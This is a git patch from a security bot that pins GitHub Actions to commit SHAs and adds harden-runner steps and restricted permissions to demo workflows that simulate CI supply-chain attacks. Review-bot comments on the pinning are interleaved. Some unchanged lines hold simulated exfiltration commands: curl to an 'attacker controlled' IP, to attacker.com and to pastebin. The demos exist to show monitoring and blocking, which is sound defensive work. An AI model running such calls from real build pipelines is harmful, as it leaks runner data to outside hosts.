From 8dfe7284f5a7bb9d5fd190efcceac4d9d622e44f Mon Sep 17 00:00:00 2001 From: "stepsecurity-int[bot]" <185740846+stepsecurity-int[bot]@users.noreply.github.com> Date: Fri, 27 Jun 2025 08:19:16 +0000 Subject: [PATCH] Apply security best practicesSigned-off-by: StepSecurity Bot --- .github/workflows/PRTargetWorkflow.yml | 9 +++++++++ .github/workflows/anomalous-outbound-calls.yaml | 6 +++++- .github/workflows/arc-codecov-simulation.yml | 4 ++-- .github/workflows/arc-secure-by-default.yml | 16 ++++++++++++++++ .github/workflows/arc-solarwinds-simulation.yml | 7 ++++++- .../workflows/arc-zero-effort-observability.yml | 7 ++++++- .github/workflows/baseline_checks.yml | 8 ++++---- .github/workflows/block-dns-exfiltration.yaml | 6 +++++- .../changed-files-vulnerability-with-hr.yml | 4 ++-- .../changed-files-vulnerability-without-hr.yml | 7 ++++++- .../workflows/hosted-file-monitor-with-hr.yml | 6 +++--- .../workflows/hosted-file-monitor-without-hr.yml | 9 +++++++-- .github/workflows/hosted-https-monitoring-hr.yml | 9 +++++++-- .../workflows/hosted-network-filtering-hr.yml | 10 +++++----- .../workflows/hosted-network-monitoring-hr.yml | 6 +++--- .github/workflows/hosted-network-without-hr.yml | 11 ++++++++--- .github/workflows/publish.yml | 4 ++-- .github/workflows/secret-in-build-log.yml | 6 +++++- .../self-hosted-file-monitor-with-hr.yml | 7 ++++++- .../self-hosted-network-filtering-hr.yml | 4 ++-- .../self-hosted-network-monitoring-hr.yml | 7 ++++++- .../tj-actions-changed-files-incident.yaml | 4 ++-- .github/workflows/toc-tou.yml | 10 ++++++++++ .github/workflows/unexpected-outbound-calls.yml | 6 +++++- 24 files changed, 132 insertions(+), 41 deletions(-) diff --git a/.github/workflows/PRTargetWorkflow.yml b/.github/workflows/PRTargetWorkflow.yml index 8bf0debd9..6ffe115b8 100644 --- a/.github/workflows/PRTargetWorkflow.yml +++ b/.github/workflows/PRTargetWorkflow.yml 
@@ -7,11 +7,20 @@ on: - synchronize - reopened +permissions: {} + jobs: pr-target-check: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - name: Check out code uses: actions/checkout@v4 diff --git a/.github/workflows/anomalous-outbound-calls.yaml b/.github/workflows/anomalous-outbound-calls.yaml index 2e87a976c..e26739fd1 100644 --- a/.github/workflows/anomalous-outbound-calls.yaml +++ b/.github/workflows/anomalous-outbound-calls.yaml @@ -1,13 +1,17 @@ name: Anomalous Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: AnomalousOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit - run: "curl https://pastebin.com -L || true" diff --git a/.github/workflows/arc-codecov-simulation.yml b/.github/workflows/arc-codecov-simulation.yml index dd1ab7dc9..74b94e2c5 100644 --- a/.github/workflows/arc-codecov-simulation.yml +++ b/.github/workflows/arc-codecov-simulation.yml @@ -7,7 +7,7 @@ jobs: runs-on: self-hosted steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: block allowed-endpoints: > @@ -28,7 +28,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} 
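Review bot: The hunk pins `step-security/harden-runner` to a full commit SHA but leaves `uses: actions/checkout@v4` two lines below on a mutable tag, so the checkout step is still resolved at run time rather than being immutable like the rest of the patch. Pin it the same way, `uses: actions/checkout@<COMMIT-SHA-OF-RELEASE> # v4`, with the SHA resolved from the release the workflow is meant to track. The same unpinned `actions/checkout@v3`/`@v4` and `actions/setup-node@v3` references survive in the hunks for arc-secure-by-default, arc-solarwinds-simulation, arc-zero-effort-observability, baseline_checks, changed-files-vulnerability-without-hr, the hosted-* and self-hosted-* workflows, publish, secret-in-build-log and toc-tou. Given the file name suggests a `pull_request_target` trigger, this is the workflow where an immutable checkout matters most; the trigger and the checkout's `ref` are outside the hunk, so which ref is fetched cannot be confirmed from here.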
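Review bot: The new job-level `permissions:` block grants `contents: read` without a justifying comment, and no step in this hunk needs it — the job only runs harden-runner and a `curl`, with no `actions/checkout`. Elsewhere in the patch the same grant carries `# for actions/checkout to fetch code`; here either drop the job-level block so the new top-level `permissions: {}` applies, or, if a later step outside the hunk does check out code, add that same comment. The hunk in unexpected-outbound-calls.yml adds the identical block and raises the same question.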
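Review bot: The new pin `elgohr/Publish-Docker-Github-Action@4feac4d5… # v5` carries a major-version tag in its comment rather than a specific release, so a reviewer cannot check that the SHA corresponds to the stated tag and pin-updating tools have no exact version to track. Record the release the SHA was resolved from, `uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # <EXACT-RELEASE-TAG>`, as the patch already does for harden-runner (`# v2.12.1`) and npm-get-version-action (`# v1.3.1`). The same applies to every other Publish-Docker pin in this patch, and to `madhead/semver-utils@36d1e0ed… # latest` in hosted-file-monitor-with-hr, hosted-file-monitor-without-hr and hosted-network-filtering-hr, where `latest` names no release at all.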
diff --git a/.github/workflows/arc-secure-by-default.yml b/.github/workflows/arc-secure-by-default.yml index 96a7098dc..d389c9e80 100644 --- a/.github/workflows/arc-secure-by-default.yml +++ b/.github/workflows/arc-secure-by-default.yml @@ -2,18 +2,34 @@ name: "ARC: Secure-By-Default Cluster-Level Policy" on: workflow_dispatch: +permissions: {} + jobs: direct-ip-hosted: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 # Codecov Scenario: Exfiltrate data to attacker's IP address - name: Data Exfiltration To Attacker Controlled IP address run: curl 104.16.209.12 --connect-timeout 5 direct-ip-arc: + permissions: + contents: read # for actions/checkout to fetch code runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 # Codecov Scenario: Exfiltrate data to attacker's IP address diff --git a/.github/workflows/arc-solarwinds-simulation.yml b/.github/workflows/arc-solarwinds-simulation.yml index 72ce7c177..febaa3ff9 100644 --- a/.github/workflows/arc-solarwinds-simulation.yml +++ b/.github/workflows/arc-solarwinds-simulation.yml @@ -6,6 +6,11 @@ jobs: arc-solarwinds-simulation: runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: 
@@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/arc-zero-effort-observability.yml b/.github/workflows/arc-zero-effort-observability.yml index 5cb8daacc..502ec9b22 100644 --- a/.github/workflows/arc-zero-effort-observability.yml +++ b/.github/workflows/arc-zero-effort-observability.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/baseline_checks.yml b/.github/workflows/baseline_checks.yml index 06fc0bc75..a2cc2aa6f 100644 --- a/.github/workflows/baseline_checks.yml +++ b/.github/workflows/baseline_checks.yml @@ -7,11 +7,11 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@int-sh + - uses: step-security/harden-runner@668ad3cce4bd0191ec8fdd9868adcb7521a9dacd # int-sh with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 
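Review bot: `step-security/harden-runner@668ad3cc… # int-sh` pins baseline_checks.yml to a commit labelled with a branch name, while every other workflow in the patch is pinned to `002fdce3… # v2.12.1`; the SHA is frozen, but `int-sh` no longer describes a reproducible release, and this job now runs a different agent build than the rest of the repository. If `int-sh` was an interim test reference, re-pin to the release used elsewhere, `- uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1`; otherwise add a comment above the step explaining why this workflow needs the internal branch build.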
@@ -22,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/block-dns-exfiltration.yaml b/.github/workflows/block-dns-exfiltration.yaml index 767d5d981..dbf19ae3c 100644 --- a/.github/workflows/block-dns-exfiltration.yaml +++ b/.github/workflows/block-dns-exfiltration.yaml @@ -1,13 +1,17 @@ name: Block DNS Exfiltration With Harden-Runner on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code name: Deploy runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: block allowed-endpoints: | diff --git a/.github/workflows/changed-files-vulnerability-with-hr.yml b/.github/workflows/changed-files-vulnerability-with-hr.yml index d8ed7379f..b5dc177a1 100644 --- a/.github/workflows/changed-files-vulnerability-with-hr.yml +++ b/.github/workflows/changed-files-vulnerability-with-hr.yml @@ -15,7 +15,7 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: disable-sudo: true egress-policy: block @@ -29,7 +29,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | 
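Review bot: `uses: tj-actions/changed-files@v40` is replaced by a different action, `step-security/changed-files@95b56dad… # v46.0.5` — a change of publisher and a jump of six major versions — yet the `List all changed files` step that presumably consumes the `changed-files` outputs lies outside the hunk and is untouched. Check that the output names and the list format that step reads are the same in the fork at that version; if not, the demo will silently list nothing. The same swap appears in changed-files-vulnerability-without-hr.yml and tj-actions-changed-files-incident.yaml, and if, as their names suggest, those workflows exist to reproduce the original tj-actions/changed-files incident, replacing the action may remove the behaviour they are meant to show; record the intent above the step, e.g. `# replaced tj-actions/changed-files with the step-security fork; outputs verified against the list step below`.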
diff --git a/.github/workflows/changed-files-vulnerability-without-hr.yml b/.github/workflows/changed-files-vulnerability-without-hr.yml index 4b74464f1..6090b6f3a 100644 --- a/.github/workflows/changed-files-vulnerability-without-hr.yml +++ b/.github/workflows/changed-files-vulnerability-without-hr.yml @@ -14,6 +14,11 @@ jobs: runs-on: ubuntu-latest name: Test changed-files steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v4 with: fetch-depth: 0 @@ -21,7 +26,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/hosted-file-monitor-with-hr.yml b/.github/workflows/hosted-file-monitor-with-hr.yml index eeb3b63f6..88ea30c60 100644 --- a/.github/workflows/hosted-file-monitor-with-hr.yml +++ b/.github/workflows/hosted-file-monitor-with-hr.yml @@ -6,7 +6,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit @@ -17,13 +17,13 @@ jobs: cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-file-monitor-without-hr.yml b/.github/workflows/hosted-file-monitor-without-hr.yml index a673fca8c..5498dcdcc 100644 --- a/.github/workflows/hosted-file-monitor-without-hr.yml 
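Review bot: Inserting a `Harden the runner` step into changed-files-vulnerability-without-hr.yml changes what the workflow demonstrates: the filename, and its `-with-hr` sibling that already runs harden-runner with `egress-policy: block`, indicate this job is the control case without Harden-Runner, and after this hunk both variants install the agent. If the pair is meant to show the difference, drop the step from the `-without-hr` files; if the audit-mode agent is now wanted everywhere, rename the file or add a comment above the step, e.g. `# NOTE: formerly the no-Harden-Runner baseline; audit-mode agent added for visibility`. The same applies to the first hunks of hosted-file-monitor-without-hr.yml and hosted-network-without-hr.yml.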
+++ b/.github/workflows/hosted-file-monitor-without-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - name: npm install @@ -13,13 +18,13 @@ jobs: cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-https-monitoring-hr.yml b/.github/workflows/hosted-https-monitoring-hr.yml index 379884875..7ad50ad83 100644 --- a/.github/workflows/hosted-https-monitoring-hr.yml +++ b/.github/workflows/hosted-https-monitoring-hr.yml @@ -2,17 +2,22 @@ name: "Hosted: HTTPS Monitoring with Harden-Runner" on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for JasonEtco/create-an-issue to read template files + issues: write # for JasonEtco/create-an-issue to create new issues runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit - uses: actions/checkout@v3 - - uses: JasonEtco/create-an-issue@v2 + - uses: JasonEtco/create-an-issue@1b14a70e4d8dc185e5cc76d3bec9eab20257b2c5 # v2.9.2 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/hosted-network-filtering-hr.yml b/.github/workflows/hosted-network-filtering-hr.yml index 7dd7dcbfa..e55801ae3 100644 --- a/.github/workflows/hosted-network-filtering-hr.yml +++ b/.github/workflows/hosted-network-filtering-hr.yml 
@@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: disable-sudo: true egress-policy: block @@ -17,7 +17,7 @@ jobs: registry.npmjs.org:443 www.githubstatus.com:443 - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -28,17 +28,17 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - - uses: madhead/semver-utils@latest + - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-monitoring-hr.yml b/.github/workflows/hosted-network-monitoring-hr.yml index 0aa554773..8ec087404 100644 --- a/.github/workflows/hosted-network-monitoring-hr.yml +++ b/.github/workflows/hosted-network-monitoring-hr.yml @@ -10,7 +10,7 @@ jobs: with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 
@@ -21,12 +21,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-without-hr.yml b/.github/workflows/hosted-network-without-hr.yml index 3533b8c72..8c3cc0f4b 100644 --- a/.github/workflows/hosted-network-without-hr.yml +++ b/.github/workflows/hosted-network-without-hr.yml @@ -6,7 +6,12 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: crazy-max/ghaction-github-status@v4 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -17,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index f42852631..122439ddc 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml 
@@ -6,7 +6,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit - uses: actions/checkout@v3 @@ -15,7 +15,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/secret-in-build-log.yml b/.github/workflows/secret-in-build-log.yml index 847c1ca10..dc7f596cf 100644 --- a/.github/workflows/secret-in-build-log.yml +++ b/.github/workflows/secret-in-build-log.yml @@ -3,15 +3,19 @@ name: Secret in Build Log on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: harden-runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit diff --git a/.github/workflows/self-hosted-file-monitor-with-hr.yml b/.github/workflows/self-hosted-file-monitor-with-hr.yml index a53608566..db6b71981 100644 --- a/.github/workflows/self-hosted-file-monitor-with-hr.yml +++ b/.github/workflows/self-hosted-file-monitor-with-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: [self-hosted, ec2] steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: 
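Review bot: In secret-in-build-log.yml the `harden-runner` step still runs after `- uses: actions/checkout@v3`, so the checkout's outbound traffic happens before the agent is installed and is not covered by `egress-policy: audit`; the commit re-pins the step but does not move it. Every harden-runner step this patch inserts elsewhere is placed first under `steps:`, so reorder here the same way: move the `- name: harden-runner` step, with its `uses:`, `with:` and `egress-policy: audit` lines, above the checkout line. The later steps that write the secret to the log are outside the hunk and cannot be assessed from here.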
@@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-filtering-hr.yml b/.github/workflows/self-hosted-network-filtering-hr.yml index 815f293ea..6e830ef9a 100644 --- a/.github/workflows/self-hosted-network-filtering-hr.yml +++ b/.github/workflows/self-hosted-network-filtering-hr.yml @@ -7,7 +7,7 @@ jobs: runs-on: [self-hosted, ec2] steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: block allowed-endpoints: > @@ -24,7 +24,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-monitoring-hr.yml b/.github/workflows/self-hosted-network-monitoring-hr.yml index 5f0ba2320..0b6f94802 100644 --- a/.github/workflows/self-hosted-network-monitoring-hr.yml +++ b/.github/workflows/self-hosted-network-monitoring-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: [self-hosted, ec2] steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: 
@@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/tj-actions-changed-files-incident.yaml b/.github/workflows/tj-actions-changed-files-incident.yaml index 7426c56fb..6641e1f6b 100644 --- a/.github/workflows/tj-actions-changed-files-incident.yaml +++ b/.github/workflows/tj-actions-changed-files-incident.yaml @@ -14,7 +14,7 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: disable-sudo: true egress-policy: audit @@ -26,7 +26,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v35 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/toc-tou.yml b/.github/workflows/toc-tou.yml index 50ca25cb9..d9a4639f6 100644 --- a/.github/workflows/toc-tou.yml +++ b/.github/workflows/toc-tou.yml @@ -15,6 +15,11 @@ jobs: contents: read pull-requests: read steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v4 - name: Wait for demo purposes @@ -40,6 +45,11 @@ jobs: contents: read pull-requests: read steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v4 - name: Wait for demo purposes 
diff --git a/.github/workflows/unexpected-outbound-calls.yml b/.github/workflows/unexpected-outbound-calls.yml index f53167970..c9d2f41c1 100644 --- a/.github/workflows/unexpected-outbound-calls.yml +++ b/.github/workflows/unexpected-outbound-calls.yml @@ -1,13 +1,17 @@ name: Unexpected Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: UnexpectedOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit - run: "curl https://attacker.com -L || true"